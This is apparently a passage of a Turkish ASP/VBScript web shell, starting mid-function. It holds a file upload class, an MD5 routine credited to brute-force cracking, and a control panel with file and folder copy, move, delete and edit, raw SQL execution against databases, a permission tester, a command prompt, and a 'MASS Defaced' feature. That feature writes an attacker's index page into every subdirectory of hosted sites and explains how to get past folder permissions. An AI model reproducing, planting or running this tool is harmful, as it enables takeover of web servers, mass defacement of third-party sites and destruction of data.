CStrB("Content-Type:"), vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStrB(llngStart + 15, pbinChunk, CR) If llngEnd = 0 Then Exit Function llngStart = llngStart + 15 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength))) End Function Private Function ParseDisposition(ByRef pbinChunk) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF) If llngEnd = 0 Then Exit Function llngStart = llngStart + 22 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength)) End Function Private Function ParseName(ByRef pstrDisposition) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStr(llngStart + 6, pstrDisposition, """") If llngEnd = 0 Then Exit Function llngStart = llngStart + 6 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseName = Mid(pstrDisposition, llngStart, llngLength) End Function Private Function ParseFileName(ByRef pstrDisposition) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStr(llngStart + 10, pstrDisposition, """") If llngEnd = 0 Then Exit Function llngStart = llngStart + 10 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseFileName = Mid(pstrDisposition, llngStart, llngLength) End Function Public Property Get Count() Count = mlngCount End Property Public Default Property Get Fields(ByVal pstrName) Dim llngIndex If IsNumeric(pstrName) Then llngIndex = CLng(pstrName) If llngIndex > mlngCount - 1 Or llngIndex < 0 Then Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.") Exit Property End If Set Fields = mobjFieldAry(pstrName) Else pstrName = LCase(pstrname) For llngIndex = 0 To mlngCount - 1 If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then Set Fields = mobjFieldAry(llngIndex) Exit Property End If Next End If Set Fields = New clsField End Property Private Sub Class_Terminate() Dim llngIndex For llngIndex = 0 To mlngCount - 1 Set mobjFieldAry(llngIndex) = Nothing Next ReDim mobjFieldAry(-1) End Sub Private Sub Class_Initialize() ReDim mobjFieldAry(-1) CR = ChrB(Asc(vbCr)) LF = ChrB(Asc(vbLf)) CRLF = CR & LF mlngCount = 0 Call RequestData Call ParseDelimiter() Call ParseData End Sub Private Function CStrU(ByRef pstrANSI) Dim llngLength Dim llngIndex llngLength = LenB(pstrANSI) For llngIndex = 1 To llngLength CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1))) Next End Function Private Function CStrB(ByRef pstrUnicode) Dim llngLength Dim llngIndex llngLength = Len(pstrUnicode) For llngIndex = 1 To llngLength CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1))) Next End Function End Class Class clsField Public Name Private mstrPath Public FileDir Public FileExt Public FileName Public ContentType Public Value Public BinaryData Public Length Private mstrText Public Property Get BLOB() BLOB = BinaryData End Property Public Function BinaryAsText() Dim lbinBytes Dim lobjRs If Length = 0 Then Exit Function If LenB(BinaryData) = 0 Then Exit Function If Not Len(mstrText) = 0 Then BinaryAsText = mstrText Exit Function End If lbinBytes = ASCII2Bytes(BinaryData) mstrText = Bytes2Unicode(lbinBytes) BinaryAsText = mstrText End Function Public Sub SaveAs(ByRef pstrFileName) Const adTypeBinary=1 Const adSaveCreateOverWrite=2 Dim lobjStream Dim lobjRs Dim lbinBytes If Length = 0 Then Exit Sub If LenB(BinaryData) = 0 Then Exit Sub Set lobjStream = Server.CreateObject("ADODB.Stream") lobjStream.Type = adTypeBinary Call lobjStream.Open() lbinBytes = ASCII2Bytes(BinaryData) Call lobjStream.Write(lbinBytes) On Error Resume Next Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite) 'if err<>0 then response.Write "
"&err.Description Call lobjStream.Close() Set lobjStream = Nothing End Sub Public Property Let FilePath(ByRef pstrPath) mstrPath = pstrPath If Not InStrRev(pstrPath, ".") = 0 Then FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1) FileExt = UCase(FileExt) End If If Not InStrRev(pstrPath, "\") = 0 Then FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1) End If If Not InStrRev(pstrPath, "\") = 0 Then FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1) End If End Property Public Property Get FilePath() FilePath = mstrPath End Property private Function ASCII2Bytes(ByRef pbinBinaryData) Const adLongVarBinary=205 Dim lobjRs Dim llngLength Dim lbinBuffer llngLength = LenB(pbinBinaryData) Set lobjRs = Server.CreateObject("ADODB.Recordset") Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength) Call lobjRs.Open() Call lobjRs.AddNew() Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0)) Call lobjRs.Update() lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength) Call lobjRs.Close() Set lobjRs = Nothing ASCII2Bytes = lbinBuffer End Function Private Function Bytes2Unicode(ByRef pbinBytes) Dim lobjRs Dim llngLength Dim lstrBuffer llngLength = LenB(pbinBytes) Set lobjRs = Server.CreateObject("ADODB.Recordset") Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength) Call lobjRs.Open() Call lobjRs.AddNew() Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes) Call lobjRs.Update() lstrBuffer = lobjRs.Fields("BinaryData").Value Call lobjRs.Close() Set lobjRs = Nothing Bytes2Unicode = lstrBuffer End Function End Class function addslash(path) if right(path,1)="\" then addslash=path else addslash=path & "\" end function sub Upload() dim objUpload,f,max,i,name,path,size,success set objUpload=New clsUpload targetPath=objUpload.Fields("folder").Value max=objUpload.Fields("max").Value success=true for i=1 to max name=objUpload.Fields("file" & i).FileName size=objUpload.Fields("file" & i).Length if (name<>"") and (size>0) then gMsg=gMsg & "
" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): " path=addslash(targetPath) & name objUpload.Fields("file" & i).SaveAs path if FSO.FileExists(path) then on error resume next set f=objFSO.GetFile(path) if IsObject(f) then if f.Size=size then success=true else success=false end if set f=nothing end if if success then gMsg=gMsg & "uploaded" else gMsg = gMsg & "failed!" end if next response.Write gMsg set objUpload=nothing end sub '*************************************************************************************************************************************** '************* MD5 HASH İşlemi Converted by FASTBOY - Used & Written Brute Algortithms by ejder ;) ************************************ '************* Md5 kodlar FASTBOY tarafından hem MD5 için hemde Serv-u için toparlanmış ve düzeltilmiştir. *************************** '************* KOdları Brute olarak belli mantıkla vede Server ın kaynaklarını kullanrak bulma, çözme olayınıda ejder yazmıştır ******** '*************************************************************************************************************************************** '********************************************************* '************* COnverted by FASTBOY ;) **************** '******* The Brute Algortihms Owned to ejder ;) ****** '********************************************************* '********************************************************* ' MD5 kodlama başladıı.. Private Const BITS_TO_A_BYTE = 8 Private Const BYTES_TO_A_WORD = 4 Private Const BITS_TO_A_WORD = 32 Private m_lOnBits(30) Private m_l2Power(30) m_lOnBits(0) = CLng(1) m_lOnBits(1) = CLng(3) m_lOnBits(2) = CLng(7) m_lOnBits(3) = CLng(15) m_lOnBits(4) = CLng(31) m_lOnBits(5) = CLng(63) m_lOnBits(6) = CLng(127) m_lOnBits(7) = CLng(255) m_lOnBits(8) = CLng(511) m_lOnBits(9) = CLng(1023) m_lOnBits(10) = CLng(2047) m_lOnBits(11) = CLng(4095) m_lOnBits(12) = CLng(8191) m_lOnBits(13) = CLng(16383) m_lOnBits(14) = CLng(32767) m_lOnBits(15) = CLng(65535) m_lOnBits(16) = CLng(131071) m_lOnBits(17) = CLng(262143) m_lOnBits(18) = CLng(524287) m_lOnBits(19) = CLng(1048575) m_lOnBits(20) = CLng(2097151) m_lOnBits(21) = CLng(4194303) m_lOnBits(22) = CLng(8388607) m_lOnBits(23) = CLng(16777215) m_lOnBits(24) = CLng(33554431) m_lOnBits(25) = CLng(67108863) m_lOnBits(26) = CLng(134217727) m_lOnBits(27) = CLng(268435455) m_lOnBits(28) = CLng(536870911) m_lOnBits(29) = CLng(1073741823) m_lOnBits(30) = CLng(2147483647) m_l2Power(0) = CLng(1) m_l2Power(1) = CLng(2) m_l2Power(2) = CLng(4) m_l2Power(3) = CLng(8) m_l2Power(4) = CLng(16) m_l2Power(5) = CLng(32) m_l2Power(6) = CLng(64) m_l2Power(7) = CLng(128) m_l2Power(8) = CLng(256) m_l2Power(9) = CLng(512) m_l2Power(10) = CLng(1024) m_l2Power(11) = CLng(2048) m_l2Power(12) = CLng(4096) m_l2Power(13) = CLng(8192) m_l2Power(14) = CLng(16384) m_l2Power(15) = CLng(32768) m_l2Power(16) = CLng(65536) m_l2Power(17) = CLng(131072) m_l2Power(18) = CLng(262144) m_l2Power(19) = CLng(524288) m_l2Power(20) = CLng(1048576) m_l2Power(21) = CLng(2097152) m_l2Power(22) = CLng(4194304) m_l2Power(23) = CLng(8388608) m_l2Power(24) = CLng(16777216) m_l2Power(25) = CLng(33554432) m_l2Power(26) = CLng(67108864) m_l2Power(27) = CLng(134217728) m_l2Power(28) = CLng(268435456) m_l2Power(29) = CLng(536870912) m_l2Power(30) = CLng(1073741824) Private Function LShift(lValue, iShiftBits) If iShiftBits = 0 Then LShift = lValue Exit Function ElseIf iShiftBits = 31 Then If lValue And 1 Then LShift = &H80000000 Else LShift = 0 End If Exit Function ElseIf iShiftBits < 0 Or iShiftBits > 31 Then Err.Raise 6 End If If (lValue And m_l2Power(31 - iShiftBits)) Then LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000 Else LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits)) End If End Function Private Function RShift(lValue, iShiftBits) If iShiftBits = 0 Then RShift = lValue Exit Function ElseIf iShiftBits = 31 Then If lValue And &H80000000 Then RShift = 1 Else RShift = 0 End If Exit Function ElseIf iShiftBits < 0 Or iShiftBits > 31 Then Err.Raise 6 End If RShift = (lValue And &H7FFFFFFE) \ m_l2Power(iShiftBits) If (lValue And &H80000000) Then RShift = (RShift Or (&H40000000 \ m_l2Power(iShiftBits - 1))) End If End Function Private Function RotateLeft(lValue, iShiftBits) RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits)) End Function Private Function AddUnsigned(lX, lY) Dim lX4 Dim lY4 Dim lX8 Dim lY8 Dim lResult lX8 = lX And &H80000000 lY8 = lY And &H80000000 lX4 = lX And &H40000000 lY4 = lY And &H40000000 lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF) If lX4 And lY4 Then lResult = lResult Xor &H80000000 Xor lX8 Xor lY8 ElseIf lX4 Or lY4 Then If lResult And &H40000000 Then lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8 Else lResult = lResult Xor &H40000000 Xor lX8 Xor lY8 End If Else lResult = lResult Xor lX8 Xor lY8 End If AddUnsigned = lResult End Function Private Function Fq(x, y, z) Fq = (x And y) Or ((Not x) And z) End Function Private Function Gq(x, y, z) Gq = (x And z) Or (y And (Not z)) End Function Private Function Hq(x, y, z) Hq = (x Xor y Xor z) End Function Private Function Iq(x, y, z) Iq = (y Xor (x Or (Not z))) End Function Private Sub FF(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(Fq(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub GG(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(Gq(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub HH(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(Hq(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub II(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(Iq(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub '********************************************************* '************* COnverted by FASTBOY ;) **************** '******* The Brute Algortihms Owned to ejder ;) ****** '********************************************************* '********************************************************* Private Function ConvertToWordArray(sMessage) Dim lMessageLength Dim lNumberOfWords Dim lWordArray() Dim lBytePosition Dim lByteCount Dim lWordCount Const MODULUS_BITS = 512 Const CONGRUENT_BITS = 448 lMessageLength = Len(sMessage) lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) \ BITS_TO_A_BYTE)) \ (MODULUS_BITS \ BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS \ BITS_TO_A_WORD) ReDim lWordArray(lNumberOfWords - 1) lBytePosition = 0 lByteCount = 0 Do Until lByteCount >= lMessageLength lWordCount = lByteCount \ BYTES_TO_A_WORD lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition) lByteCount = lByteCount + 1 Loop lWordCount = lByteCount \ BYTES_TO_A_WORD lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition) lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3) lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29) ConvertToWordArray = lWordArray End Function Private Function WordToHex(lValue) Dim lByte Dim lCount For lCount = 0 To 3 lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1) WordToHex = WordToHex & Right("0" & Hex(lByte), 2) Next End Function Public Function MD5(sMessage) Dim x Dim k Dim AA Dim BB Dim CC Dim DD Dim a Dim b Dim c Dim d Const S11 = 7 Const S12 = 12 Const S13 = 17 Const S14 = 22 Const S21 = 5 Const S22 = 9 Const S23 = 14 Const S24 = 20 Const S31 = 4 Const S32 = 11 Const S33 = 16 Const S34 = 23 Const S41 = 6 Const S42 = 10 Const S43 = 15 Const S44 = 21 x = ConvertToWordArray(sMessage) a = &H67452301 b = &HEFCDAB89 c = &H98BADCFE d = &H10325476 For k = 0 To UBound(x) Step 16 AA = a BB = b CC = c DD = d FF a, b, c, d, x(k + 0), S11, &HD76AA478 FF d, a, b, c, x(k + 1), S12, &HE8C7B756 FF c, d, a, b, x(k + 2), S13, &H242070DB FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE FF a, b, c, d, x(k + 4), S11, &HF57C0FAF FF d, a, b, c, x(k + 5), S12, &H4787C62A FF c, d, a, b, x(k + 6), S13, &HA8304613 FF b, c, d, a, x(k + 7), S14, &HFD469501 FF a, b, c, d, x(k + 8), S11, &H698098D8 FF d, a, b, c, x(k + 9), S12, &H8B44F7AF FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1 FF b, c, d, a, x(k + 11), S14, &H895CD7BE FF a, b, c, d, x(k + 12), S11, &H6B901122 FF d, a, b, c, x(k + 13), S12, &HFD987193 FF c, d, a, b, x(k + 14), S13, &HA679438E FF b, c, d, a, x(k + 15), S14, &H49B40821 GG a, b, c, d, x(k + 1), S21, &HF61E2562 GG d, a, b, c, x(k + 6), S22, &HC040B340 GG c, d, a, b, x(k + 11), S23, &H265E5A51 GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA GG a, b, c, d, x(k + 5), S21, &HD62F105D GG d, a, b, c, x(k + 10), S22, &H2441453 GG c, d, a, b, x(k + 15), S23, &HD8A1E681 GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8 GG a, b, c, d, x(k + 9), S21, &H21E1CDE6 GG d, a, b, c, x(k + 14), S22, &HC33707D6 GG c, d, a, b, x(k + 3), S23, &HF4D50D87 GG b, c, d, a, x(k + 8), S24, &H455A14ED GG a, b, c, d, x(k + 13), S21, &HA9E3E905 GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8 GG c, d, a, b, x(k + 7), S23, &H676F02D9 GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A HH a, b, c, d, x(k + 5), S31, &HFFFA3942 HH d, a, b, c, x(k + 8), S32, &H8771F681 HH c, d, a, b, x(k + 11), S33, &H6D9D6122 HH b, c, d, a, x(k + 14), S34, &HFDE5380C HH a, b, c, d, x(k + 1), S31, &HA4BEEA44 HH d, a, b, c, x(k + 4), S32, &H4BDECFA9 HH c, d, a, b, x(k + 7), S33, &HF6BB4B60 HH b, c, d, a, x(k + 10), S34, &HBEBFBC70 HH a, b, c, d, x(k + 13), S31, &H289B7EC6 HH d, a, b, c, x(k + 0), S32, &HEAA127FA HH c, d, a, b, x(k + 3), S33, &HD4EF3085 HH b, c, d, a, x(k + 6), S34, &H4881D05 HH a, b, c, d, x(k + 9), S31, &HD9D4D039 HH d, a, b, c, x(k + 12), S32, &HE6DB99E5 HH c, d, a, b, x(k + 15), S33, &H1FA27CF8 HH b, c, d, a, x(k + 2), S34, &HC4AC5665 II a, b, c, d, x(k + 0), S41, &HF4292244 II d, a, b, c, x(k + 7), S42, &H432AFF97 II c, d, a, b, x(k + 14), S43, &HAB9423A7 II b, c, d, a, x(k + 5), S44, &HFC93A039 II a, b, c, d, x(k + 12), S41, &H655B59C3 II d, a, b, c, x(k + 3), S42, &H8F0CCC92 II c, d, a, b, x(k + 10), S43, &HFFEFF47D II b, c, d, a, x(k + 1), S44, &H85845DD1 II a, b, c, d, x(k + 8), S41, &H6FA87E4F II d, a, b, c, x(k + 15), S42, &HFE2CE6E0 II c, d, a, b, x(k + 6), S43, &HA3014314 II b, c, d, a, x(k + 13), S44, &H4E0811A1 II a, b, c, d, x(k + 4), S41, &HF7537E82 II d, a, b, c, x(k + 11), S42, &HBD3AF235 II c, d, a, b, x(k + 2), S43, &H2AD7D2BB II b, c, d, a, x(k + 9), S44, &HEB86D391 a = AddUnsigned(a, AA) b = AddUnsigned(b, BB) c = AddUnsigned(c, CC) d = AddUnsigned(d, DD) Next MD5 = LCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d)) End Function '*************************************************************************************************************************** '*************************** MD5 KOdları Biter. ************************************************************************* '*************************************************************************************************************************** if popup = False then 'Link ve Konum paneli by ejder 'Türk Bayrağı Ascii Karakterlerle - Created By FasTBoY :) Response.Write "
 Z
" response.write "
" response.write "

" response.write "
   Sistem Analizi* | MASS Attack | Permision Tester | Klasör İşlemleri | CMD | Mail Bombardımanı | *Ben kimim*!    

" response.write "
   Arama:    
" response.write "
" response.write "
   Konum :    
" response.write "" response.write "
" response.write "
" 'Yetki paneli by ejder response.write "" response.write "
" response.write "" response.write "" call yetki response.write "
   Yetki :   
" response.write "

" end if SELECT CASE mode CASE 2 ' Dizin kopyala TAŞI by ejder on error resume next response.write "" response.write "
" response.write "
" response.write "" tablo30(" Dizin Kopyala / Taşı Merkezi") tablo30(" ") response.write " " tablo12("Kop. Yer : ") tablo12("Kopyala Tasi ") tablo12("
") response.write "

" Call Hata CASE 3 ' dizin kop taşımam gerçekleşiyor by ejder on error resume next if islem="kopyala" then FSO.CopyFolder konum,FolderPath2 isl="kopyalandı.." elseif islem="tasi" then FSO.MoveFolder konum,FolderPath2 isl="taşındı.." end if response.Write "

Klasor "&isl&"
" response.Write "
Kaynak : "&FolderPath&"
Hedef : "&FolderPath2 response.Write "

by ejder
" Call Hata CASE 4 ' Dizin Sİlmee by ejder on error resume next FSO.DeleteFolder del if err<>0 then Call olmadi("Dizin Silenemdi") else Call oldu("Dizin Silindi") end if CASE 5 ' Dosya silme olayı gerçeklişiypor by ejder on error resume next FSO.DeleteFile del if err<>0 then Call olmadi("Dosya Silinemedi") else Call oldu("Dosya Silindi") end if 'CASE 6 ' Dosya Dowlaod etme by ejder ' Download hatalı olduğu için, ÜSTTE taşıdımm CASE 7 ' Dosya Kopayla Taşıma POST kısmı by ejder on error resume next response.write "" response.write "
" response.write "
" response.write "" tablo30(" Dosya Kopyala / Taşı Merkezi") tablo30(" ") response.write " " tablo12("Kop. Yer : ") tablo12("Kopyala Tasi ") tablo12("
") response.write "

" Call Hata CASE 8 ' Dosya kopyala, taşımaa olayı by ejder on error resume next if islem="kopyala" then FSO.CopyFile file,folder&"" isl="kopyalandı.." elseif islem="tasi" then FSO.MoveFile file,folder&"" isl="taşındı.." end if if err <> 0 then response.Write "

Başarısızlıkla sonuçlandı !!!
" else response.Write "

Klasor "&isl&"
" end if response.Write "
Kaynak : "&file&"
Hedef : "&folder&"\" response.Write "

by ejder
" Call Hata CASE 9 ' Dosya İçini görüntüle by ejder on error resume next Response.Write "
"&path&"

" Response.Write "
" set f = FSO.OpenTextFile(file,1) Response.Write "
"&Server.HTMLEncode(f.readAll)&"
" Response.Write "
" nolist = True if err<>62 then Hata if err.number=62 then Response.Write "" nolist = False end if CASE 10 ' ASP txt php .. gibi dosyaları Editlemek için POSt kısmı by ejder on error resume next set f = FSO.OpenTextFile(file,1) response.Write "
" Response.Write "" Response.Write "" Response.Write "" Response.Write "
" Call Hata nolist = True CASE 11 ' Editleme olayıı gerçekleşiyorr by ejder on error resume next set saveTextFile = FSO.OpenTextFile(file,2,true,false) Call Hata saveTextFile.Write(islem) saveTextFile.close if err<>0 then olmadi("Editlenemedii") else oldu("Editlendi") end if CASE 12 ' Resim Dosyasını Görüntülee by ejder on error resume next Response.Write "


" Call Hata nolist = True CASE 13 ' SQL için TAbloları Listeleme by ejder Response.Write "
Tablolar

" Set objConn = Server.CreateObject("ADODB.Connection") Set objADOX = Server.CreateObject("ADOX.Catalog") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = file objConn.Open objADOX.ActiveConnection = objConn response.write "" For Each table in objADOX.Tables If table.Type = "TABLE" Then Response.Write "" End If Next response.write "
4 "&table.Name&"
" response.write "
" Call Hata nolist = True CASE 14 ' TAblo içeriği görüntüleme by ejder Call SQL_menu_by_ejder Call SQL_by_ejder(file,table) nolist = True CASE 15 ' SQL kod yerleştirme olayı by ejder if islem = "select" then inject = inject1 if islem = "delete" then inject = inject2 if islem = "insert" then inject = inject3 if islem = "update" then inject = inject4 if islem = "diger" then inject = inject5 SQL_menu_by_ejder response.write "
Db Yeri : "&file&"
" response.write "
Sql komut : "&inject&"

" if islem = "select" then if not ejdersql = "" then Call MSSQL_by_ejder(ejdersql,inject) else Call SQL_by_ejder(file,inject) end if else on error resume next if ejdersql = "" then Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = file objConn.Open else Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Open ejdersql end if if err <> 0 then response.write "

N DataBase ile Bağlantınız SağlanaMAdıı !!! by ejder :( N


" else on error resume next objRcs.Open inject,objConn, adOpenKeyset , , adCmdText if err <> 0 then Call olmadi("
SQL İnjection Komutunuzda HATA var. Bilmiyorsan Kullanma

") else Call oldu("
SQL İnjection Başarıyla GErçekleştii.

") end if end if objRcs.close objConn.close end if nolist = True CASE 16 ' Dosya ADI değiştirme Formu by ejder on error resume next response.write "" response.write "
" response.write "
" response.write "" tablo30(" Dosya ADı değiştirme MErkezi") tablo30("Adı : "&islem&"
Yeri : "&file&"") response.write " " tablo12("Dosyanın Yeni Adı:  ") tablo12("
") response.write "

" Call Hata CASE 17 ' Dosya Adı değiştirme Olayı gerçekleşiyor by E_JDER on error resume next Set fileObject = fso.GetFile(file) fileObject.Name = islem if err <> 0 then Call olmadi("
DOsya Adı değişeMEdii

") else Call oldu("
Dosya Adı değişti

") end if Set fileObject = Nothing Call Hata CASE 18 ' MAss Defeced Merkezi by ejder on error resume next response.write "
" response.write "
" response.write "" tablo30(" MASS Defaced Merkezi") tablo30("...... ::::: İndex KOD unu Aşağıya Yaz / Yapıştır ::::: ......") tablo30("
Konum :

") response.write " " tablo12O("") tablo12O(" Brute - Single - Private    Eklenti ") tablo12O(" Kopyalayarak - Oluşturarak") tablo12O("") yazsol("Brute : Belirtilen Dizinin ALtındaki; Tüm Dizinlere ve onlarında ALt Dizinleri İndex BAsar. ") yazsol("Single : Belirtilen Dizinin ALtındaki; Alt Dizinlere İndex BAsar. ") yazsol("Private : Belirtilen Dizinin ALtındaki; Alt Dizinlere İstediğiniz İsimle İndex BAsar. ") yazsol("Eklenti : BRUTE & Single ile kullanılır. Permsion var ise bunu seçmenize ayarlamanıza gerek yok. Eğer site isimlerini listeleytebiliyor, ve içine girremiyor fakat klasör atlayarak girebiliyorsanız. o zaman bunu seçin ve bulunan klasörrden sonrakine gidip oraya index leri atar. Mesela ; '..site\savsak_com', '..\site\haber_com' .. gibi siteelr listeli. bunların içlerine giridğinizde görüntülkeme yetkinzi yok . Ama eğer '..\site\savsak_com\www\' yapınca girebiliyorsnaız. PERMİSİON aşma yöntemidir. böylece Eklenti yerine 'www' yazarak ve seçerekden. tüm sitelere o klaösr içine girme yetkisini sağlayıp, index bıraktırırrız. ") yazsol("Kopyalayarak : FSO dizinine bir TXT yazar. Sonra onu TÜm klasörlere KOpyalayarak işlem yapar. Eğer FSO dizininde yazma yok ise, işlem gerçekleşmez. TÜM MASS lar böyledir. ") yazsol("Yaratarak : Direk index kodunuzu, Klasölerde OLUŞTURARAk MASS yapar. BU ejder & SaVSaK.CoM FARkı ile. 1-2 defa başıma geldi=) o yüzden bu özelleiği ekledim. ") yazsol("NOT : Brute & Single da 9 çeşit index basar, Private da İstdiğiniz İsimle 1 tane atar ;) ") response.write "

" Call Hata CASE 19 ' MAss Attack İŞleniyor. Eğer İndex yok ise, Hata ve FOrm sunuyor, aksi halde MASS yapıyor. konum = request.form("masskonum") filee = request.form("massfile") islem = request.form("massislem") hash9 = request.form("masshash9") hash2 = request.form("masshash2") hash3 = request.form("masshash3") inject1 = request.form("massinject1") filee = filee&"


orospu ejder ;)
" inject7 = filee if hash9 = "copy" then on error resume next a=Left(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),InStrRev(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),"\")) Set hackindex = FSO.CreateTextFile(a&"\ejder.txt", True) hackindex.write filee if err <> 0 then response.write "

N Bulunduğun Dizinde Yazma YEtin yok. Bu yüzden İndex Sayfası oluşturulamadı. N

N Eğer ki Server içine bir Tane index yükler ve aşağıdaki yere tam link ini yazarsan, O zaman MASS Defaced başlıyacaktır. N


" response.write "" response.write "
" response.write "
" response.write "" response.write "" Call tablo30("İndex in Server daki kendi İndex inin YErini GÖster. ") Call tablo30(" ") Call tablo12("") Call tablo12("
") response.write "

" else set hacking = nothing hacked = a&"\ejder.txt" hash6 = konum Call MassAttack2(konum,filee,hash2) Call MassAttack(hash6,filee,hash2) response.write "
..... :::: Bitttiiii :::: .....
" response.write "


by ejder ;)

" Response.Write "" end if else if hash9 = "yarat" then hash6 = konum Call MassAttack2(konum,filee,hash2) Call MassAttack(hash6,filee,hash2) response.write "
..... :::: Bitttiiii :::: .....
" response.write "


by ejder ;)

" Response.Write "" end if end if Call Hata CASE 20 ' Hata sonucu, düzeltme yapıldı ise, burdan MAss dewaam ediyor. on error resume next Set cloner2 = fso.GetFile(hacked) if err <> 0 then response.write "N İndex Bulunamadı. KOnumunu veridğin İndex yada Dosya BULUNAMADI. Mass Durdurudu !!! N
" set cloner2 = nothing else set cloner2 = nothing file="ejder" hash6 = konum Call MassAttack2(konum,file,hash2) Call MassAttack(hash6,file,hash2) response.write "
..... :::: Bitttiiii :::: .....
" response.write "


by ejder ;)

" Response.Write "" end if Call Hata CASE 21 ' MASS tester formu by ejder on error resume next response.write "" response.write "
" response.write "
" response.write "" tablo30(" MASS Permision Tester") tablo30("...... ::::: İzinleri Kontrol Eder ::::: ......") tablo30("
Konum :

") response.write " " tablo12O("


") tablo12(" ") response.write "" response.write "
NOT : Bununla, Alt klasörlerde Permision varmı yok mu ,Onu kontrol eder ve Listeler... N

" Call Hata CASE 22 ' MASS TEster işleme görüntüleme by ejder Call Tester(konum) response.write "
..... :::: Bitttiiii :::: .....
" response.write "


by ejder ;)

" Response.Write "" Call Hata CASE 23 ' arama bulma- en güzel özeliği time out olmaması bulduğunu yazmasıdır =) by ejder eseridir. response.write "
" i=0 Call arama(konum) response.write "

" Response.Write "" nolist = True Call Hata CASE 24 ' Klasör işlermleri için Upload - Dosya ayarat - klaösr yarat FORM ları by ejder on error resume next response.write "
" response.write "
Upload Merkezi
" response.write "
" response.write "" response.write "Max: " response.write "" response.write "" response.write "" response.write "" response.write "
" response.write "
" response.write "" response.write "
" response.write "" response.write "
" response.write "
Klasör Oluştur :
" response.write "
Dosya Adı :
" response.write "
" Call Hata CASE 25 ' Upload işlemi by E_JDER Upload() CASE 26 ' Klasör yarat by ejder response.write "" if FSO.FolderExists(konum&"\"&file) = True then response.write "
N Böyle Bir Klasör ZATEN VAr !!!! N
" else on error resume next FSO.CreateFolder(konum&"\"&file) if err <> 0 then olmadi("Klasör Oluşturulamadı") else oldu("Klasör Oluşturuldu") end if end if response.write "
" Call hata CASE 27 ' Dosya yarat by ejder response.write "" on error resume next Set MyFile = FSO.CreateTextFile(konum&"\"&file, True) MyFile.write islem if err <> 0 then olmadi("Dosya Oluşturulamadı") else oldu("Dosya Oluşturuldu") end if response.write "
" MyFile.close() Call hata CASE 28 ' CMD Formu ve işlem yeri by ejder if cmdkod="" then cmdkod="ipconfig" response.write "
" response.write "
CMD Komut Listele : " response.write "
" response.write "
